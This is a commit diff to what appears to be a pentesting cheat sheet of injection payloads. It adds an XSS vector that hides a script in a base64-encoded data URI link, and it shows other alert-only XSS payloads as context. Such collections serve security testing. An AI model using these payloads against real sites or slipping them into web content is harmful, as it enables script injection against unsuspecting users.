XSS using base64 encoded href data in a link

2024-07-09 11:51:26 +00:00 · 2019-01-10 18:24:43 +01:00 · 2019-01-10 18:24:43 +01:00 · c7a292c19d
commit c7a292c19d
parent ea0bddc18a
1 changed files with 7 additions and 1 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -162,6 +162,12 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```

+XSS using base64 encoded href data in a link
+
+```
+<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
+```
+
 ## XSS in wrappers javascript and data URI

 XSS with javascript:
@ -939,4 +945,4 @@ Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php
 - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/)
 - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) 
 - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
+- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)